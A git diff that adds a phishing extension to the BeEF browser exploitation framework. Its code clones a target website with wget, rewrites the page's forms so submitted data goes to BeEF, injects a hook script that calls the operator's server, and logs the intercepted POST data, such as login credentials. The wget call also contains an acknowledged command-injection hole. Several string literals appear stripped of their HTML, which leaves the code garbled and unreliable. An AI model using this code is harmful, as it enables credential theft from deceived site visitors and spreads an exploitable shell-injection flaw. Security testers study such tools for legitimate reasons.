diff --git a/.gitignore b/.gitignore index c02e0a406..9ebc010fe 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,4 @@ beef.db test/msf-test -custom-config.yaml \ No newline at end of file +custom-config.yaml +extensions/social_engineering/web_cloner/cloned_pages \ No newline at end of file diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml new file mode 100644 index 000000000..d3b279ba6 --- /dev/null +++ b/extensions/social_engineering/config.yaml @@ -0,0 +1,24 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + extension: + social_engineering: + enable: true + name: 'Social Engineering' + authors: ["antisnatchor"] + web_cloner: + add_beef_hook: true + user_agent: "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2" diff --git a/extensions/social_engineering/extension.rb b/extensions/social_engineering/extension.rb new file mode 100644 index 000000000..95edcfe2d --- /dev/null +++ b/extensions/social_engineering/extension.rb @@ -0,0 +1,31 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +module BeEF +module Extension +module SocialEngineering + extend BeEF::API::Extension + + @short_name = 'social_engineering' + @full_name = 'Social Engineering' + @description = 'Phishing attacks for your pleasure: web page cloner (POST interceptor and BeEF goodness), highly configurable mass mailer, etc.' +end +end +end + +require 'extensions/social_engineering/web_cloner/web_cloner' +require 'extensions/social_engineering/web_cloner/interceptor' + + diff --git a/extensions/social_engineering/web_cloner/interceptor.rb b/extensions/social_engineering/web_cloner/interceptor.rb new file mode 100644 index 000000000..7eba2ad46 --- /dev/null +++ b/extensions/social_engineering/web_cloner/interceptor.rb @@ -0,0 +1,56 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +module BeEF + module Extension + module SocialEngineering + + class Interceptor < Sinatra::Base + + def initialize(file_path) + super + @config = BeEF::Core::Configuration.instance + @cloned_page = "" + File.open(file_path,'r').each do |line| + @cloned_page += line + end + end + + # intercept GET + get "/" do + print_info "GET request" + @cloned_page + end + + # intercept POST + # the 'action' attribute of the 'form' element is modified to the URI / + # in this way the request can be intercepted + post "/" do + print_info "POST request" + request.body.rewind + data = request.body.read + print_info "Intercepted data:" + print_info data + + #todo: do a GET request on the target website, retrieve the respone headers and check if X-Frame-Options is present + #todo: or framebusting is present. If is not present, open the original URL in an iFrame, otherwise redirect the user + #todo: to the original page + end + + end + end + end +end + diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb new file mode 100644 index 000000000..f962b4e90 --- /dev/null +++ b/extensions/social_engineering/web_cloner/web_cloner.rb @@ -0,0 +1,115 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +module BeEF + module Extension + module SocialEngineering + class WebCloner + include Singleton + + + def initialize + @http_server = BeEF::Core::Server.instance + @config = BeEF::Core::Configuration.instance + @cloned_pages_dir = "#{File.expand_path('../../../../extensions/social_engineering/web_cloner', __FILE__)}/cloned_pages/" + end + + def clone_page(url) + #todo see web_cloner.rb, work perfectly + # output.html and output2.html (the one with the form action modified to /) + # must be stored in cloned_pages + print_info "Cloning page at URL #{url}" + uri = URI(url) + + #output = url.split("/").last #todo test if http://google.com/ produces an error + output = uri.host + output_mod = "#{output}_mod" + + user_agent = @config.get('beef.extension.social_engineering.web_cloner.user_agent') + + #todo: prevent Command Injection + wget = "wget '#{url}' -O #{@cloned_pages_dir + output} --no-check-certificate -c -k -U '#{user_agent}'" + IO.popen(wget.to_s) { |f| @result = f.gets } + print_debug @result + #todo, also check if the URL is valid with: + #unless (url =~ URI::regexp).nil? + # # Correct URL + #end + + #todo: this should be the good way to prevent command injection, because the shell is not open. + #todo: there are issues: Scheme missing when calling wget + #wget_path = "wget" + #env = {} + #args = %W['#{url}' -O #{output} --no-check-certificate -c -k -U #{user_agent}] + #IO.popen([env, wget_path, *args], 'r+') { |f| @result = f.gets } + + + #if !File.writable?(File.basename(@cloned_pages_dir + output_mod)) + # print_info "Cannot write to file..." + # IO.popen("chmod 777 #{@cloned_pages_dir}") { |f| @result = f.gets } + # sleep 2 + #end + + File.open("#{@cloned_pages_dir + output_mod}", 'w') do |out_file| + File.open("#{@cloned_pages_dir + output}", 'r').each do |line| + # Modify the
line changing the action URI to / in order to be properly intercepted by BeEF + if line.include?("") && @config.get('beef.extension.social_engineering.web_cloner.add_beef_hook') + out_file.print add_beef_hook(line) + print_info "Added BeEF hook." + else + out_file.print line + end + end + end + print_info "Page at URL [#{url}] has been cloned. Modified HTML in [cloned_paged/#{output_mod}]" + + file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve + @http_server.mount("/#{output}", BeEF::Extension::SocialEngineering::Interceptor.new(file_path)) + print_info "Mounting cloned page on URL #{output}" + @http_server.remap + end + + private + # Replace with + def add_beef_hook(line) + host = @config.get('beef.http.host') + port = @config.get('beef.http.port') + js = @config.get('beef.http.hook_file') + hook = "http://#{host}:#{port}#{js}" + line.gsub!("","\n") + line + end + + end + end + end +end +